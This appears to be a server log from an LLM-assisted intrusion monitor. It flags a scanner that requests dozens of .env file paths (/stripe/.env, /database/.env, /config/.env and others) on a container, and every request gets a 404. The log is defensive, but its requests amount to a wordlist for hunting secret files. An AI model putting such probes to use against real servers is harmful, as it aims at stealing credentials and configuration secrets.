Mar 20 15:20:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:18.689941 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to Laravel .env file path (common attempt to discover environment configuration). 404 indicates not found but pattern is a probing behavior. Line=2026-03-20T15:16:01.416427652Z GET /laravel/core/.env 404 0.548 ms - 9
Mar 20 15:20:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:22.432235 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:20:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:22.432269 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Direct access attempt to a sensitive file (.env) via HTTP leading to 404. This pattern is commonly used in reconnaissance or attempted data exposure. Line=2026-03-20T15:16:01.423330316Z GET /payment/.env 404 0.624 ms - 9
Mar 20 15:20:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:26.728213 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:26.728251 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /admin/.env is a common sensitive-file discovery probe. Line=2026-03-20T15:16:01.468594523Z GET /admin/.env 404 0.556 ms - 9
Mar 20 15:20:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:30.012179 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:30 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:30.012217 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /core/.env is a common probe for sensitive file exposure; although 404, it indicates potential reconnaissance activity. Line=2026-03-20T15:16:01.499248661Z GET /core/.env 404 1.220 ms - 9
Mar 20 15:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:31.939889 [observer] Pipeline: processed=7095 pattern_hits=6602 llm_calls=493 llm_errors=3 learned=5
Mar 20 15:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:31.939918 [observer] Patterns: hash=6588 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=493
Mar 20 15:20:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:33.017980 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:33 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:33.018012 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for sensitive environment file (.env) at web path; 404 indicates not found but could be probing for config data. Line=2026-03-20T15:16:01.502791887Z GET /stripe/.env 404 2.232 ms - 9
Mar 20 15:20:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:36.032406 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:20:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:36.032445 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive path (.env) without authorization; returns 404 but indicates potential probing for sensitive configuration files. Line=2026-03-20T15:16:01.523544809Z GET /assets/.env 404 3.501 ms - 9
Mar 20 15:20:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:39.987142 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:20:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:39.987196 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Requesting a sensitive file (.env) which is commonly targeted for information disclosure attempts. The 404 status means not found, but probing behavior is suspicious. Line=2026-03-20T15:16:01.590374858Z GET /app/.env 404 1.231 ms - 9
Mar 20 15:20:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:44.010462 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:20:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:44.010495 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive environment file (.env) directory, resulting in a 404. This pattern is commonly used to probe for sensitive files. Line=2026-03-20T15:16:01.615443783Z GET /docker/.env 404 3.859 ms - 9
Mar 20 15:20:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:49.619045 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 15:20:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:49.619080 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (.env) via HTTP, 404 response, may indicate probing or misconfiguration. Line=2026-03-20T15:16:01.632957256Z GET /docker/app/.env 404 3.247 ms - 9
Mar 20 15:20:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:56.144153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:20:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:20:56.144211 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /server/.env commonly indicates probing for sensitive environment configuration files. Line=2026-03-20T15:16:01.648061746Z GET /server/.env 404 2.130 ms - 9
Mar 20 15:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:01.189666 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:01.189758 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive file path (.env) resulting in 404; indicates potential probing activity. Line=2026-03-20T15:16:01.682398721Z GET /web/.env 404 0.789 ms - 9
Mar 20 15:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:01.972996 [observer] Pipeline: processed=7104 pattern_hits=6604 llm_calls=500 llm_errors=3 learned=5
Mar 20 15:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:01.973024 [observer] Patterns: hash=6590 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=500
Mar 20 15:21:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:08.364522 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.66 action=alert pattern_type=
Mar 20 15:21:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:08.364559 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .env file via HTTP is a common probe for sensitive configuration exposure; 404 means not found but the pattern is a potential directory traversal/secret exposure attempt Line=2026-03-20T15:16:01.694308937Z GET /src/.env 404 1.128 ms - 9
Mar 20 15:21:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:12.798018 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:21:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:12.798053 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden/.env file path is often probed by attackers to discover sensitive configuration data; 404 indicates not found but still noteworthy. Line=2026-03-20T15:16:01.723636544Z GET /src/config/.env 404 6.227 ms - 9
Mar 20 15:21:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:18.070082 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:21:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:18.070119 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file (.env) at a public path commonly indicates probing for configuration leakage. The request returned 404, but the pattern is a known indicator of potential credential exposure attempts. Line=2026-03-20T15:16:01.801669723Z GET /public/.env 404 0.670 ms - 9
Mar 20 15:21:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:24.444010 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:24 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:24.444056 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (/config/.env) via HTTP and a 404 response suggests probing for secrets. Line=2026-03-20T15:16:01.848006579Z GET /config/.env 404 0.689 ms - 9
Mar 20 15:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:31.340606 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:31.340640 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file (.env) is being requested, which is a common probing pattern. The request returns a 404, but the attempt itself is notable. Line=2026-03-20T15:16:01.855984875Z GET /portal/.env 404 5.167 ms - 9
Mar 20 15:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:31.939152 [observer] Pipeline: processed=7111 pattern_hits=6606 llm_calls=505 llm_errors=3 learned=5
Mar 20 15:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:31.939202 [observer] Patterns: hash=6592 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=505
Mar 20 15:21:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:36.599211 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:21:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:36.599252 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:21:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:40.385973 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:40 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:40.386011 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for sensitive file /env/.env; received 404 which suggests probing activity rather than legitimate access Line=2026-03-20T15:16:01.870820730Z GET /env/.env 404 7.615 ms - 9
Mar 20 15:21:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:45.865273 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:45 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:45.865450 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request targets a sensitive path (/dev/.env) and returns 404, which can indicate probing for sensitive files. Line=2026-03-20T15:16:01.881563826Z GET /dev/.env 404 0.932 ms - 9
Mar 20 15:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:49.764507 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:21:49 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:49.764541 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env) leading to a 404, which could indicate probing for secrets. Not definitive malware, but warrants alert. Line=2026-03-20T15:16:01.884768095Z GET /prod/.env 404 1.885 ms - 9
Mar 20 15:21:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:54.523809 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:54 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:54.523847 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to the .env file path in a GET request is a common probe pattern; 404 indicates not found but the attempt itself is suspicious for potential information disclosure attempts. Line=2026-03-20T15:16:01.896086340Z GET /new/.env 404 0.700 ms - 9
Mar 20 15:21:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:59.884543 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:21:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:21:59.884581 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to access a sensitive file (/conf/.env) resulting in 404 suggests probing or misconfiguration; not definitive malicious but noteworthy. Line=2026-03-20T15:16:01.992801673Z GET /conf/.env 404 1.898 ms - 9
Mar 20 15:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:01.964027 [observer] Pipeline: processed=7121 pattern_hits=6610 llm_calls=511 llm_errors=3 learned=5
Mar 20 15:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:01.964275 [observer] Patterns: hash=6596 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=511
Mar 20 15:22:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:04.455127 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:22:04 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:04.455188 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a .env file path ( /.env ) is a common probe for sensitive configuration exposure. The request returned 404 but indicates potential scanning activity. Line=2026-03-20T15:16:02.092983199Z GET /www/.env 404 13.566 ms - 9
Mar 20 15:22:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:09.062392 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.60 action=alert pattern_type=
Mar 20 15:22:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:09.062427 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file path (/site/.env) often indicates probing for environment configuration, a common attacker action. Line is a standard 404 response but merits alert for potential credential/environment leakage risk. Line=2026-03-20T15:16:02.129514163Z GET /site/.env 404 4.515 ms - 9
Mar 20 15:22:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:13.736095 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:22:13 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:13.736132 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to the .env file via HTTP is a common probe pattern attempting to disclose configuration secrets. Not definitive malicious activity, but warrants alerting. Line=2026-03-20T15:16:02.164645180Z GET /crm/.env 404 3.698 ms - 9
Mar 20 15:22:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:17.852780 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:17.852818 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a local environment file (.env) via HTTP is a common probing pattern; the 404 response suggests the file does not exist, but the attempt may indicate reconnaissance. Line=2026-03-20T15:16:02.207902623Z GET /local/.env 404 25.778 ms - 9
Mar 20 15:22:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:22.880247 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:22.880287 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET for a sensitive path (.env) returning 404 indicates probing for exposed configuration files. Line=2026-03-20T15:16:02.215310563Z GET /apps/.env 404 0.668 ms - 9
Mar 20 15:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:27.081836 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:27.081870 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /application/.env returned 404, which could indicate probing for sensitive environment files. Line=2026-03-20T15:16:02.226419221Z GET /application/.env 404 10.243 ms - 9
Mar 20 15:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:31.938752 [observer] Pipeline: processed=7130 pattern_hits=6613 llm_calls=517 llm_errors=3 learned=5
Mar 20 15:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:31.938780 [observer] Patterns: hash=6599 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=517
Mar 20 15:22:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:32.102639 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:32.102675 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a sensitive file (.env) resulting in 404; likely probing for secrets Line=2026-03-20T15:16:02.227717905Z GET /development/.env 404 0.784 ms - 9
Mar 20 15:22:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:38.556759 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.68 action=alert pattern_type=
Mar 20 15:22:38 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:38.556796 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file (.env) on a web path returning 404 indicates potential probing for secrets; common attacker pattern though not confirmed. Line=2026-03-20T15:16:02.252825605Z GET /website/.env 404 0.615 ms - 9
Mar 20 15:22:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:42.093761 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:22:42 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:42.093798 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /backup/.env is commonly probed by attackers to discover sensitive environment configuration. The 404 indicates the resource doesn't exist, but the attempted access pattern is noteworthy. Line=2026-03-20T15:16:02.283360932Z GET /backup/.env 404 0.697 ms - 9
Mar 20 15:22:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:47.313807 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:22:47 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:47.313842 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access attempt to a sensitive file /old/.env reflected in a 404 response; pattern suggests potential probing for secrets. Line=2026-03-20T15:16:02.307075068Z GET /old/.env 404 1.464 ms - 9
Mar 20 15:22:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:52.474130 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:52.474185 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to access a sensitive file path (/storage/.env) resulting in 404, indicating potential probing for secrets. Line=2026-03-20T15:16:02.371980965Z GET /storage/.env 404 1.015 ms - 9
Mar 20 15:22:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:56.111016 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:22:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:22:56.111055 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request for a sensitive path (/test/.env) resulting in 404 indicates probing for environment files; could be reconnaissance. Line=2026-03-20T15:16:02.380721400Z GET /test/.env 404 0.615 ms - 9
Mar 20 15:23:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:00.786739 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:23:00 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:00.786774 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to /tests/.env with 404 status indicates probing for sensitive environment file; potential credential exposure scanning. Line=2026-03-20T15:16:02.394020236Z GET /tests/.env 404 10.060 ms - 9
Mar 20 15:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:01.988513 [observer] Pipeline: processed=7141 pattern_hits=6617 llm_calls=524 llm_errors=3 learned=5
Mar 20 15:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:01.989427 [observer] Patterns: hash=6603 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=524
Mar 20 15:23:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:05.700261 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:23:05 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:05.700304 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a hidden file path /rest/.env returning 404 suggests a potential probe for sensitive environment configuration files. Not definitively malicious, but warrants alerting. Line=2026-03-20T15:16:02.412557485Z GET /rest/.env 404 0.551 ms - 9
Mar 20 15:23:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:09.434364 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:23:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:09.434399 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .env file via HTTP endpoint is unusual and could indicate probing for sensitive configuration leaks. Line=2026-03-20T15:16:02.420951834Z GET /graphql/.env 404 5.914 ms - 9
Mar 20 15:23:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:12.814657 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:23:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:12.814691 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a .env file path is commonly probed in reconnaissance or misconfiguration checks. Although it resulted in a 404, it indicates potential sensitive-file probing. Line=2026-03-20T15:16:02.472238851Z GET /v1/.env 404 0.571 ms - 9
Mar 20 15:23:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:17.578466 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:23:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:17.578503 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file (.env) via the registry API path suggests probing behavior; not successful (404) but warrants alerting. Line=2026-03-20T15:16:02.493791708Z GET /v2/.env 404 0.731 ms - 9
Mar 20 15:23:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:21.035620 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.72 action=alert pattern_type=
Mar 20 15:23:21 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:21.035649 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request to a sensitive file (.env) under /mail/ path indicating potential probing for configuration leakage. Line=2026-03-20T15:16:02.506686359Z GET /mail/.env 404 0.895 ms - 9
Mar 20 15:23:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:26.231704 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.75 action=alert pattern_type=
Mar 20 15:23:26 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:26.231740 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (/database/.env) is often used to probe for secrets or misconfigured environments. Line=2026-03-20T15:16:02.558878337Z GET /database/.env 404 0.668 ms - 9
Mar 20 15:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:31.086383 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:31.086418 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Request targets a sensitive file (.env) which could indicate probing for secrets or misconfigured exposure. Not definitive malicious activity, but warrants alerting. Line=2026-03-20T15:16:02.565312881Z GET /db/.env 404 0.615 ms - 9
Mar 20 15:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:31.937848 [observer] Pipeline: processed=7150 pattern_hits=6619 llm_calls=531 llm_errors=3 learned=5
Mar 20 15:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:31.937879 [observer] Patterns: hash=6605 prefix=14 regex=0 contains=0 deny=127 alert=843 suppress=0 misses=531
Mar 20 15:23:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:34.911480 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 20 15:23:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:34.911521 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to /tmp/.env detected via HTTP GET returning 404, which is a common probe for sensitive file exposure. Line=2026-03-20T15:16:02.572213828Z GET /tmp/.env 404 2.567 ms - 9
Mar 20 15:23:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:39.434277 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:23:39 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:39.434310 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a system file path /var/.env via HTTP is a common probe for sensitive files; though the request returned 404, it indicates potential reconnaissance. Line=2026-03-20T15:16:02.588584562Z GET /var/.env 404 2.847 ms - 9
Mar 20 15:23:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:43.444284 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:23:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:43.444334 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Access to a sensitive file path (.env) via HTTP request (GET /kyc/.env) could indicate probing or credential exposure attempts. Line=2026-03-20T15:16:02.596884522Z GET /kyc/.env 404 1.044 ms - 9
Mar 20 15:23:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:23:46.874287 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
